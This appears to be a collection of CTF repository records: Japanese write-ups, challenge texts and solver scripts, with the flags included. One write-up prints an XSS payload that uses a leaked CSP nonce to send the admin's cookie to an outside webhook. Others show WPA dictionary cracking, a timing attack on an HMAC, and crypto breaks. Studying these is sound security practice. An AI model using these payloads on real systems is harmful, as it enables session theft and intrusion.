crypto.randomBytes(16).toString('base64');\n\nconst template = name => `\n<html>\n\n${name === '' ? 
'': `<h1>${name}</h1>`}\n<a href='#' id=elem>View Fruit</a>\n\n<script nonce=${NONCE}>\nelem.onclick = () => {\n location = \"/?name=\" + encodeURIComponent([\"apple\", \"orange\", \"pineapple\", \"pear\"][Math.floor(4 * Math.random())]);\n}\n</script>\n\n</html>\n`;\n\napp.get('/', (req, res) => {\n res.setHeader(\"Content-Security-Policy\", `default-src none; script-src 'nonce-${NONCE}';`);\n res.send(template(req.query.name || \"\"));\n})\n\napp.use('/' + SECRET, express.static(__dirname + \"/secret\"));\n\napp.listen(port, () => {\n console.log(`Example app listening at http://localhost:${port}`)\n})\n```\n\n`name`にスクリプトタグを入力してXSSできないか調べてみる。\n\n* https://babier-csp.dicec.tf/?name=%3Cscript%3Ealert(0);%3C/script%3E \n\nすると、開発者ツールに以下のメッセージが出ていた。\n\n```\nRefused to execute inline script because it violates the following Content Security Policy directive\n```\n\nどうやら、スクリプトタグについている`nonce`が一致していないとブロックされるらしい。\n\n以下のように`nonce`を含めると任意のスクリプトを実行できることがわかる。\n\n* https://babier-csp.dicec.tf/?name=%3Cscript%20nonce=LRGWAXOY98Es0zz0QOVmag==%3Ealert(0);%3C/script%3E\n\n問題文に\n\n> The admin will set a cookie secret equal to config.secret in index.js.\n\nとあるので、[Admin Bot](https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=babier-csp)にアクセスし、以下のURLを入力する。\n\n```url\nhttps://babier-csp.dicec.tf/?name=<script%20nonce=\"LRGWAXOY98Es0zz0QOVmag==\">%20window.open(\"https://webhook.site/485d646e-854c-4699-b351-86540967fce7?q=\"%2Bdocument.cookie);</script>\n```\n\nこれにより、Admin Botがsecretをクエリ文字列にいれてWebhookにアクセスする。\n\n![](img/2021-02-06-22-11-32.png)\n\nsecret が分かったので、https://babier-csp.dicec.tf/{secret} にアクセスする。ソースコードを見るとフラグが書かれていた。\n\n![](img/2021-02-06-22-11-11.png)\n\n<!-- dice{web_1s_a_stat3_0f_grac3_857720} -->" }, { "alpha_fraction": 0.7761194109916687, "alphanum_fraction": 0.7860696315765381, "avg_line_length": 66, "blob_id": "ac96eca51377676aeae0ebd79f61ab44fcbb6dee", "content_id": "a4d08389483014dcff97f6ea19fa895e39dd7df6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 201, "license_type": "no_license", "max_line_length": 123, "num_lines": 3, "path": "/2021/BCACTF_2.0/Little_e/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald's favorite prime is 3 and made it his public exponent; he keeps insisting that it's secure. Help me prove him wrong.\n\n[encrypted.txt](https://objects.bcactf.com/bcactf2/smallersa/encrypted.txt)\n" }, { "alpha_fraction": 0.7491748929023743, "alphanum_fraction": 0.7706270813941956, "avg_line_length": 39.46666717529297, "blob_id": "2104e9d3843252ed0bfa0907df45cf811c842ee6", "content_id": "f7dbc90723b1a2f22b43d18587ad374b92499d1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 606, "license_type": "no_license", "max_line_length": 198, "num_lines": 15, "path": "/2021/BCACTF_2.0/FNES_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend developed this encryption service, and he's been trying to get us all to use it. Sure, it's convenient and easy to use, and it allows you to send encrypted messages easily, and...\n\nWell, I want to get control of his service so I can monitor all the messages! I think he's hidden some features and files behind a secret admin passphrase. 
Can you help me access those hidden files?\n\n[fnes1.py](https://objects.bcactf.com/bcactf2/fnes-1/fnes1.py)\n\n`nc crypto.bcactf.com 49153`\n\nHint 1 of 2\n\nWhat changes between encryptions?\n\nHint 2 of 2\n\nCan you modify an encrypted message without knowing the key?" }, { "alpha_fraction": 0.4078303277492523, "alphanum_fraction": 0.554649293422699, "avg_line_length": 26.244443893432617, "blob_id": "b741dd3248196b3ad88fde2f6d9c5653a55795a7", "content_id": "c50962ba3f90aea951a0ac4bb1fd91a761551858", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1312, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/2021/UIUCTF_2021/CEO/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`.cap`ファイルが与えられる。\n\n`aircrack-ng`を使って辞書攻撃をしたところ、パスワードが`nanotechnology`であることが分かった。\n\n```bash\n$ aircrack-ng megacorp-01.cap -w ~/john/rockyou.txt\nReading packets, please wait...\nOpening megacorp-01.cap\nRead 1914 packets.\n\n # BSSID ESSID Encryption\n\n 1 E4:95:6E:45:90:24 joesheer WPA (1 handshake)\n\nChoosing first network as target.\n\nReading packets, please wait...\nOpening megacorp-01.cap\nRead 1914 packets.\n\n1 potential targets\n\n Aircrack-ng 1.6\n\n [00:04:14] 5325566/14344391 keys tested (21254.74 k/s)\n\n Time left: 7 minutes, 4 seconds 37.13%\n\n KEY FOUND! [ nanotechnology ]\n\n\n Master Key : 12 71 F9 32 8F FA BF E0 E2 80 F5 D3 F8 E0 A7 C0\n 73 E1 BB 0C AE 51 08 DA CF FD D3 7A 79 04 73 15\n\n Transient Key : CF AC 16 F6 95 E1 93 05 94 A2 43 EC 52 A8 AB C7\n 46 C5 45 71 16 5F 1C 82 27 1E 8C B2 B6 7E 03 33\n 6A 16 E3 15 4E 39 4E EC 4F DB 35 3C CF 95 D7 9A\n F7 BF 06 69 E4 4F 34 D4 04 B0 3F F2 AC D7 7B 6C\n\n EAPOL HMAC : 06 C0 57 DC F4 DD 8F 2C F5 98 99 19 9E E3 45 32\n```\n\n<!-- uiuctf{nanotechnology} -->\n" }, { "alpha_fraction": 0.5160680413246155, "alphanum_fraction": 0.5992438793182373, "avg_line_length": 15.030303001403809, "blob_id": "e8e40d87b1249232f37ad92da3ccf5c57cdac6fa", "content_id": "71ba5897df5a4fc198b4b5f10193013cdecc0e8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 715, "license_type": "no_license", "max_line_length": 60, "num_lines": 33, "path": "/2021/redpwnCTF_2021/round-the-bases/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nテキストが与えられる。\n\nテキストのパターンを調べると、以下の2つのテキストから構成されていることが分かった。\n\n```\n9mTfc:..Zt9mTZ_:IIcu9mTN[9km7D\n9mTfc:..Zt9mTZ_:K0o09mTN[9km7D\n9mTfc:..Zt9mTZ_:Jj8< (最後のみ)\n```\n\n`IIcu...`を`0`,`K0o0...`を`1`として変換してみる。\n\n`} = 0x7d = 0b01111101`だとすると、最後は`1`になるはずなので、`Jj8<`も`1`に変換する。\n\n```py\nfrom Crypto.Util.number import *\n\nc = open('round-the-bases','r').read()\nc = c.split('7D')\n\nb = ''\nfor d in c:\n if 'IIcu' in d:\n b += '0'\n else:\n b += '1'\n\nprint(long_to_bytes(int(b,2)))\n```\n\n<!-- flag{w0w_th4t_w4s_4ll_wr4pp3d_up} -->\n" }, { "alpha_fraction": 0.6777777671813965, "alphanum_fraction": 0.6777777671813965, "avg_line_length": 14, "blob_id": "a00ec058e1c1ddd07b219cfa4ae16b9e0ed7d21a", "content_id": "1f4f43af97d67d468f42d335990c556337963636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 246, "license_type": "no_license", "max_line_length": 38, "num_lines": 12, "path": "/2021/ImaginaryCTF_2021/Hidden/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n.psd 
ファイルが与えられる。\n\n`strings`コマンドを実行したところ、フラグが得られた。\n\n```bash\n$ strings challenge.psd | grep ictf\nictf{wut_how_do_you_see_this}\n```\n\n<!-- ictf{wut_how_do_you_see_this} -->\n" }, { "alpha_fraction": 0.2515822649002075, "alphanum_fraction": 0.3322784900665283, "avg_line_length": 22.44444465637207, "blob_id": "738864c614b51315b131f4d108e0fe9b88be04e8", "content_id": "06af81eec76991b01e3b30dbdd2ab3e239588542", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 634, "license_type": "no_license", "max_line_length": 99, "num_lines": 27, "path": "/2020/hxp_CTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# hxp CTF 2020\n\n* https://2020.ctf.link/\n\n* 2020/12/19 00:00 JST — 2020/12/21 00:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | -------------------------------------- | ---------------------------- | ----: | -----: |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | --------------------- | ------- | ----: | -----: |\n| Crypto | nanothorpe | | 110 | 82 |\n| Misc | Secure Program Config | | 106 | 85 |\n\n---\n\n## Result\n\n* 19 points\n\n* 184 / 532 (> 1 pt)" }, { "alpha_fraction": 0.3987560570240021, "alphanum_fraction": 0.5348997712135315, "avg_line_length": 18.554054260253906, "blob_id": "58e0ab435457734afdf39789664117c9d2a1ded9", "content_id": "0ce091d21c7b0ab44116fe2e362b318328fb4f03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1577, "license_type": "no_license", "max_line_length": 128, "num_lines": 74, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_2/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49158/ にアクセスする。\n\n`Wasm Protect Site 1`と同様にwasmを見る。\n\n```wasm\n(module\n (memory $memory (;0;) (export \"memory\") 1)\n (func $cmp (;0;) (param $v0 (;0;) i32) (param $v1 (;1;) i32) (result i32)\n (local $v2 (;2;) i32)\n loop $label0\n local.get $v2\n local.get $v0\n i32.add\n i32.load8_u\n local.get $v2\n local.get $v1\n i32.add\n i32.load8_u\n local.get $v2\n i32.const 9\n i32.mul\n i32.const 127\n i32.and\n i32.xor\n i32.ne ★\n local.get $v2\n i32.const 27\n i32.ne\n i32.and\n if\n i32.const 0\n return\n end\n local.get $v2\n i32.const 1\n i32.add\n local.tee $v2\n i32.const 1\n i32.sub\n local.get $v0\n i32.add\n i32.load8_u\n i32.eqz\n if\n i32.const 1\n return\n end\n br $label0\n end $label0\n i32.const 0\n return\n )\n (func $checkFlag (;1;) (export \"checkFlag\") (param $a (;0;) i32) (result i32)\n local.get $a\n i32.const 1000\n call $cmp\n return\n )\n (data (i32.const 1000) \"bjsxPKMH|\\227N\\1bD\\043b]PR\\19e%\\7f/;\\17\")\n)\n```\n\n★ 部分で文字の比較を行っているので、Breakpointをつけて変数を監視する。`stack[1].value`に比較対象の文字コードが入っている。\n\n```py\nchar = [98, 99, 97, 99, 116, 102, 123, 119, 52, 115, 109, 45, 119, 49, 122, 52, 114, 68, 114, 121, 45, 88, 99, 48, 119, 90, 125]\n\nfor c in char:\n print(chr(c),end='')\n```\n\n<!-- bcactf{w4sm-w1z4rDry-Xc0wZ} -->\n" }, { "alpha_fraction": 0.6382978558540344, "alphanum_fraction": 0.8297872543334961, "avg_line_length": 27.399999618530273, "blob_id": "07288ba6ddf0d3a8a6b4fd7e759413e09b9e89a0", "content_id": "7798143e8de1f69f165e2e9efd488750b3b8ed1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 141, "license_type": "no_license", "max_line_length": 86, "num_lines": 5, "path": 
"/2021/UMassCTF_2021/easteregg/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Dangeresque likes easter eggs.\n\nhttp://static.ctf.umasscybersec.org/rev/9996d2d0-60d0-476c-9c85-a3b053f0a358/adventure\n\nCreated by Jakob#9448" }, { "alpha_fraction": 0.5082212090492249, "alphanum_fraction": 0.7593423128128052, "avg_line_length": 34.26315689086914, "blob_id": "1115b8afc82f91bfac736aba029c22bdb1d957dc", "content_id": "789d90022c9df1dbbfd840af2e93e863d3017052", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 254, "num_lines": 19, "path": "/2021/angstromCTF_2021/Exclusive_Cipher/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from itertools import cycle\nimport string\n\nc = 'ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c'\nc = bytes.fromhex(c)\nm = b'actf{'\n\ndef xor(text,key):\n return bytes([a ^ b for (a,b) in zip(text, cycle(key))])\n\ndef is_ascii(text):\n return all(char in bytes(string.printable,'ascii') for char in text)\n\nwhile len(c) > len(m):\n key = xor(c,m)[:5]\n plaintext = xor(c,key)\n if is_ascii(plaintext) and b'}' in plaintext:\n print(plaintext)\n c = c[1:]" }, { "alpha_fraction": 0.5181058645248413, "alphanum_fraction": 0.5668523907661438, "avg_line_length": 29.5744686126709, "blob_id": "ee18fc8a696201743d6bbe462ff9067e722c014b", "content_id": "ab3649a1ba31a8603fa93bc251d1c8f3fe12af1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1436, "license_type": "no_license", "max_line_length": 107, "num_lines": 47, "path": "/2020/SquareCTF2020/Hash_My_Awesome_Commands/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nimport base64\nimport struct\nimport re\n\nconn = remote('challenges.2020.squarectf.com',9020)\n\n# debug mode\nconn.recvuntil('Enter command:',drop=True)\nconn.sendline('debug|9W5iVNkvnM6igjQaWlcN0JJgH+7pComiQZYdkhycKjs=')\nconn.recvuntil('Enter command:',drop=True)\n\nresult = [0 for _ in range(2**8)]\n\npayload = b''\n\n# payload = b'\\x9d\\xd0(K<\\x7f\\t\\xb8\\xb3N\\xa3A\\x07\\x973\\xde\\xde\\x97\\x18Q\\x06m\\x0c\\x08s\\xd8\\xbbI\\xac\\x20\\x4c'\n\nfor j in range(1,33):\n\n buf = b'\\x00'*(32-j)\n\n top = [k for k in range(2**8)]\n while len(top) != 1:\n for i in range(2**8):\n if i not in top:\n continue\n data = struct.pack(\"B\",i) # \\x00 - \\xff\n data = payload + data + buf\n b64_data = base64.b64encode(data).decode()\n conn.sendline('flag|' + b64_data)\n conn.recvline()\n msg = conn.recvline().decode() # time info\n varify_time = int(re.sub(r\"\\D\",\"\",msg)) \n result[i] = [varify_time,i]\n print(i,msg,end='') # for debug\n skip = conn.recvuntil('Enter command:',drop=True)\n if(j == 32):\n print(skip) # flag check\n\n sort_result = sorted(result,reverse=True)\n topgroup = [x[1] for x in sort_result][:10] # just in case\n top = [x for x in top if x in topgroup]\n print('top: ', top)\n\n payload += struct.pack(\"B\",top[0])\n print('payload: ', payload)" }, { "alpha_fraction": 0.29507362842559814, "alphanum_fraction": 0.7176231741905212, "avg_line_length": 25.253334045410156, "blob_id": "11c115ce8da24dd8b6e8c906523208d416189b00", "content_id": 
"aa33abb7d423393a410748526266d1242b1f0ade", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2087, "license_type": "no_license", "max_line_length": 171, "num_lines": 75, "path": "/2021/RaRCTF_2021/babycrypt/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\nfrom Crypto.Util.number import getPrime, bytes_to_long\n\nflag = bytes_to_long(open(\"/challenge/flag.txt\", \"rb\").read())\n\ndef genkey():\n e = 0x10001\n p, q = getPrime(256), getPrime(256)\n if p <= q:\n p, q = q, p\n n = p * q\n pubkey = (e, n)\n privkey = (p, q)\n return pubkey, privkey\n\ndef encrypt(m, pubkey):\n e, n = pubkey\n c = pow(m, e, n)\n return c\n\npubkey, privkey = genkey()\nc = encrypt(flag, pubkey)\n\nhint = pubkey[1] % (privkey[1] - 1)\nprint('pubkey:', pubkey)\nprint('hint:', hint)\nprint('c:', c)\n```\n\nRSA暗号の問題で、`e,n,c` と `hint = n % (q-1)` が既知である。\n\n```\npubkey: (65537, 8233844853736079846340942338892377350084205826692932262262169655906024996611709932668810597429977504654174681615645717480946467295158630669046073907212183)\nhint: 41162916934005887239397941494469703620898846542249479175280452807025539991659\nc: 2668213429910053210439086430709560263484415254994522634947359490234264025445117346305280609718185533536116506975101248392127837369553056944962889943997393\n```\n\n`hint = n % (q-1), p > q`より、\n\n```\nhint = p * q % (q-1)\nhint = p % (q-1)\nhint + i * (q-1) = p\np > q, p < 2q より、i = 1\nq(hint + (q-1)) = n\nq^2 + (hint - 1)q - n = 0\n```\n\nが成り立つ。`q`についての二次方程式を解けばよい。\n\n```py\n# sage\nfrom Crypto.Util.number import *\n\ne = 65537\nn = 8233844853736079846340942338892377350084205826692932262262169655906024996611709932668810597429977504654174681615645717480946467295158630669046073907212183\nhint = 41162916934005887239397941494469703620898846542249479175280452807025539991659\nc = 2668213429910053210439086430709560263484415254994522634947359490234264025445117346305280609718185533536116506975101248392127837369553056944962889943997393\n\nx = var('x')\ns = solve(x^2 + (hint - 1)*x - n == 0, x)\nq = int(s[0].right())\np = n // q\nassert p*q == n and p >= q\n\nd = power_mod(e, -1, (p-1)*(q-1))\nm = power_mod(c, d, n)\nprint(long_to_bytes(m))\n```\n\n<!-- rarctf{g3n3r1c_m4th5_equ4t10n_th1ng_ch4ll3ng3_5a174f54e6} -->\n" }, { "alpha_fraction": 0.6833333373069763, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 24.714284896850586, "blob_id": "f8047fddeef47ec95cb833d1ce0608b3afc6c94f", "content_id": "fd1bc15b260f675d2e59b0751b1ffa26b7cf31b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 242, "license_type": "no_license", "max_line_length": 94, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/please_not_trace_me/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "フラグを復号してくれるのは良いけど,表示してくれない!!\n\n[chall](https://beginners-dist-production.s3.isk01.sakurastorage.jp/please_not_trace_me/chall)\n\n7e3285ee71b14355a62e9fe2dcdb22ec2c13e080\n\n想定難易度: Easy\n" }, { "alpha_fraction": 0.5036208033561707, "alphanum_fraction": 0.5569453835487366, "avg_line_length": 16.261363983154297, "blob_id": "c1bb080f1f7c931ecd0a579830c5efd4e7bfab6a", "content_id": "45507bc7a81751c8623b8f584b01a30f1f271780", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1723, "license_type": "no_license", "max_line_length": 69, "num_lines": 88, "path": 
"/2020/WaniCTF/LCG_crack/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`nc lcg.wanictf.org 50001`を実行。\n\n```bash\n$ nc lcg.wanictf.org 50001\n\n\n ::: .,-::::: .,-:::::/\n ;;; ,;;;'````',;;-'````'\n [[[ [[[ [[[ [[[[[[/\n $$' $$$ \"$$c. \"$$\n o88oo,.__`88bo,__,o,`Y8bo,,,o88o\n \"\"\"\"YUMMM \"YUMMMMMP\" `'YMUP\"YMM\n\n\n\n +=============================+\n | 1. Generate the next number |\n | 2. Guess the next number |\n | 3. Exit |\n +=============================+\n\n - Guess the numbers in a row, and I'll give you a flag!\n> 1\n11570939290553957957\n```\n\n`1`で乱数を生成、`2`で乱数を予測できる。\n\nどうやら、次の乱数を当て続ければフラグを取得できそう。\n\nしかし、プログラムを読むと`ValueError`でも`continue`する(先に進んでしまう)ので、`int`以外を入れ続けてもよい。\n\n```py\nexcept ValueError:\n print(\"Please enter an integer\\n\\n\\n\")\n continue\n```\n\nおそらく、非想定解だが...\n\n```bash\n> 2\n - [1/10] Guess the next number!\n> dasd\nPlease enter an integer\n\n - [2/10] Guess the next number!\n> adsa\nPlease enter an integer\n\n - [3/10] Guess the next number!\n> dsa\nPlease enter an integer\n\n - [4/10] Guess the next number!\n> ds\naPlease enter an integer\n\n - [5/10] Guess the next number!\n> fs\nPlease enter an integer\n\n - [6/10] Guess the next number!\n> fa\nPlease enter an integer\n\n - [7/10] Guess the next number!\n> sa\nPlease enter an integer\n\n - [8/10] Guess the next number!\n> dsa\nPlease enter an integer\n\n - [9/10] Guess the next number!\n> d\nPlease enter an integer\n\n - [10/10] Guess the next number!\n> a\nPlease enter an integer\n\nCongratz! FLAG{\n```\n\n<!-- FLAG{y0u_sh0uld_buy_l0tt3ry_t1ck3ts} -->\n" }, { "alpha_fraction": 0.632612943649292, "alphanum_fraction": 0.683693528175354, "avg_line_length": 13.54285717010498, "blob_id": "6284a51ed6e46508157201d7ca9d079b07503ca9", "content_id": "def7a3391216f17c55a655409a59c30492a793a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1414, "license_type": "no_license", "max_line_length": 92, "num_lines": 70, "path": "/2020/pbctf_2020/Apoche_I/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n提示された5つのリンクのうち、http://34.68.159.75:55275/ だけアクセスできる。\n\nさらに2つリンクがあって、上ではJavaScript、下ではCSSが読み込まれる。\n\n![](img/2020-12-06-12-54-56.png)\n\n`JavaScript`\n\n```js\n// FOrce the user to click okay many times\n\nconsole.log(\"uhmm you asked for it!!\");\n\nvar i;\n\n\n\nfor (i = 0; i < 100000; i++)\n alert(\"Hello world!1!!!! \");\n\n\n//ahh you disabled them :*(\n//\ndocument.write(\"Ahh why did you disable those dialogs...? We were having a lot of fun! 
;)\");\n```\n\n```css\n@font-face {\n font-family: ComicSans;\n src: url(ComicSansMS3.ttf);\n}\n\nbody {\n font-family: ComicSans;\n}\n\n.bold {\n font-weight: bold;\n}\n\n.it {\n font-style: italic;\n}\n\n.mono {\n font-family: Monospace;\n}\n```\n\n手がかりがつかめず...\n\n# Solution\n\n**[writeup]**\n\n* https://github.com/0xbigshaq/ctf-stuff/tree/main/perfect-blue-ctf-2020/apoche\n\n`robots.txt`を使ってディレクトリ構造を確かめる。\n\nこうして見つかった`secrets`ディレクトリの中にヒントがあるので、それをもとにディレクトリトラバーサルでフラグを入手。\n\n(2020/12/07 サーバーが立ち上がっていないので確認できず...)\n\n## Comment\n\nWeb問題で`robots.txt`を手がかりにするというのは、pwn問題でいうところの表層解析に等しいのかもしれないと思った。\n" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.6380090713500977, "avg_line_length": 19.090909957885742, "blob_id": "4a5c079ec7e51dc9e84f0d1462b75b5a6a431f84", "content_id": "47a3cfaba63fa5dc28ccc64564789cf2cbf35148", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/2021/RaRCTF_2021/Archer/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ne = ELF('archer')\nio = remote('193.57.159.27', 23258)\n\nio.recvuntil(': ')\nio.sendline('yes')\nio.recvuntil('?\\n')\nh = str(hex(e.symbols['code']-0x500000)).replace('0x','')\nio.sendline(h)\nio.interactive()\n" }, { "alpha_fraction": 0.7394366264343262, "alphanum_fraction": 0.7652581930160522, "avg_line_length": 31.846153259277344, "blob_id": "5ea2c43cdefb992ccc1ee8ae21d6f84f3afc94c1", "content_id": "5e5d4bf7f33ca12f428090b11d685d78f347dd9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 426, "license_type": "no_license", "max_line_length": 209, "num_lines": 13, "path": "/2021/BCACTF_2.0/Movie-Login-2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's that time of year again! Another movie is coming out, and I really want to get some insider information. I heard that you leaked the last movie poster, and I was wondering if you could do it again for me?\n\n[denylist.json](https://objects.bcactf.com/bcactf2/movie-login-2/denylist.json)\n\nhttp://web.bcactf.com:49153/\n\nHint 1 of 2\n\nWhat steps are they taking to prevent an injection?\n\nHint 2 of 2\n\nCheck the denylist maybe?" 
}, { "alpha_fraction": 0.4937877058982849, "alphanum_fraction": 0.5044373273849487, "avg_line_length": 26.891088485717773, "blob_id": "a5c9dc64276750d57bed90a700fb98c529953026", "content_id": "9f947530e79cf5de3b9d4ad2dabf24e550a2895a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2817, "license_type": "no_license", "max_line_length": 82, "num_lines": 101, "path": "/2021/WaniCTF21-spring/OUCS/cry-oucs/server.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import random\n\nfrom Crypto.Util.number import bytes_to_long, getPrime, long_to_bytes\n\nfrom const import description, flag, logo\n\n\nclass OkamotoUchiyamaCryptoSystem:\n def __init__(self, bits: int):\n p, q = getPrime(bits), getPrime(bits)\n n = p * p * q\n\n while g := random.randrange(2, n):\n if pow(g, p - 1, p * p) != 1:\n break\n h = pow(g, n, n)\n\n self.p = p\n self.n = n\n self.g = g\n self.h = h\n\n def encrypt(self, plaintext: bytes) -> bytes:\n plaintext = bytes_to_long(plaintext)\n n, g, h = self.n, self.g, self.h\n r = random.randrange(2, n)\n\n ciphertext = pow(g, plaintext, n) * pow(h, r, n) % n\n ciphertext = long_to_bytes(ciphertext)\n\n return ciphertext\n\n def decrypt(self, ciphertext: bytes) -> bytes:\n ciphertext = bytes_to_long(ciphertext)\n p, g = self.p, self.g\n\n a = (pow(ciphertext, p - 1, p ** 2) - 1) // p\n b = (pow(g, p - 1, p * p) - 1) // p\n b_ = pow(b, -1, p)\n plaintext = a * b_ % p\n plaintext = long_to_bytes(plaintext)\n\n return plaintext\n\n def get_publickey(self) -> tuple[int, int, int]:\n return self.n, self.g, self.h\n\n\nif __name__ == \"__main__\":\n print(logo)\n cipher = OkamotoUchiyamaCryptoSystem(bits=1024)\n\n while True:\n print()\n print(description)\n while not (choice := input(\"> \")) in \"12345\":\n print(\"Invalid choice.\")\n\n choice = int(choice)\n\n # 1. Encrypt the flag\n if choice == 1:\n ciphertext = cipher.encrypt(flag)\n ciphertext = bytes_to_long(ciphertext)\n print(f\"{ciphertext = :#x}\")\n\n # 2. Encrypt\n elif choice == 2:\n print(\"Enter your plaintext\")\n plaintext = int(input(\"> \"), 0)\n plaintext = long_to_bytes(plaintext)\n\n ciphertext = cipher.encrypt(plaintext)\n ciphertext = bytes_to_long(ciphertext)\n print(f\"{ciphertext = :#x}\")\n\n # 3. Decrypt\n elif choice == 3:\n print(\"Enter your ciphertext\")\n ciphertext = int(input(\"> \"), 0)\n ciphertext = long_to_bytes(ciphertext)\n\n # ... except for the flag\n plaintext = cipher.decrypt(ciphertext)\n if flag == plaintext:\n print(\"Decryption succeeded, but we won't tell you the result :P\")\n continue\n plaintext = bytes_to_long(plaintext)\n print(f\"{plaintext = :#x}\")\n\n # 4. Show public key\n elif choice == 4:\n n, g, h = cipher.get_publickey()\n print(f\"{n = :#x}\")\n print(f\"{g = :#x}\")\n print(f\"{h = :#x}\")\n\n # 5. 
Exit\n else:\n print(\"Bye :)\")\n break\n" }, { "alpha_fraction": 0.6217579245567322, "alphanum_fraction": 0.6476945281028748, "avg_line_length": 21.40322494506836, "blob_id": "5af387c41c14b2dd684a81d8be8ff6dc31dd7550", "content_id": "63da03f469b6ce7637a79e9576b8697b9f8fba97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1388, "license_type": "no_license", "max_line_length": 76, "num_lines": 62, "path": "/2021/WaniCTF21-spring/Automaton_Lab/mis-automaton-lab/automaton-lab.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import sys\nfrom concurrent.futures import ThreadPoolExecutor\nimport random\nfrom Crypto.Util.number import getPrime\n\nimport const\nimport automaton\n\ncells = 15\n\n\ndef checkanswer(reference, answer):\n if len(answer) != cells:\n print(const.error)\n sys.exit()\n for c in answer:\n if not (c == \"0\" or c == \"1\"):\n print(const.error)\n sys.exit()\n answer = int(answer, 2)\n if reference != answer:\n print(const.lose)\n sys.exit()\n return\n\nsolver = automaton.rule30(bits=cells)\nprint(const.message1)\ninput()\n\n# 1st Question\ninit = random.randint(1, 2**cells - 2)\ngen = 7\nreference = solver.solve(init, gen)\nprint(const.quiz1)\nprint(\"init = \" + format(init, \"0\"+str(cells)+\"b\"))\nprint(\"gen = \" + str(gen))\nanswer = input(\"> \")\ncheckanswer(reference, answer)\n\n# 2nd Question\ninit = (1 << random.randint(0, cells-1)) | (1 << random.randint(0, cells-1))\ngen = 997\nreference = solver.solve(init, gen)\nprint(const.quiz2)\nprint(\"init = \" + format(init, \"0\"+str(cells)+\"b\"))\nprint(\"gen = \" + str(gen))\nanswer = input(\"> \")\ncheckanswer(reference, answer)\n\n# 3rd Quiestion\ninit = 1\ngen = getPrime(1024)\nreference = solver.solve(init, gen)\nprint(const.quiz3)\nprint(\"init = \" + format(init, \"0\"+str(cells)+\"b\"))\nprint(\"gen = \" + str(gen))\nanswer = input(\"> \")\ncheckanswer(reference, answer)\n\n# Congratz\nprint(const.message2)\nprint(const.flag)" }, { "alpha_fraction": 0.7827715277671814, "alphanum_fraction": 0.8164793848991394, "avg_line_length": 52.599998474121094, "blob_id": "60327e7ecc78a9eec8e68a9c1e2dee31aefa1ec2", "content_id": "c5b6477a65b8d054c9931b6d37e661a6f688c16c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 267, "license_type": "no_license", "max_line_length": 119, "num_lines": 5, "path": "/2020/SquareCTF2020/Oh_Sheet/README.md", "repo_name": "security-notes/workspace", 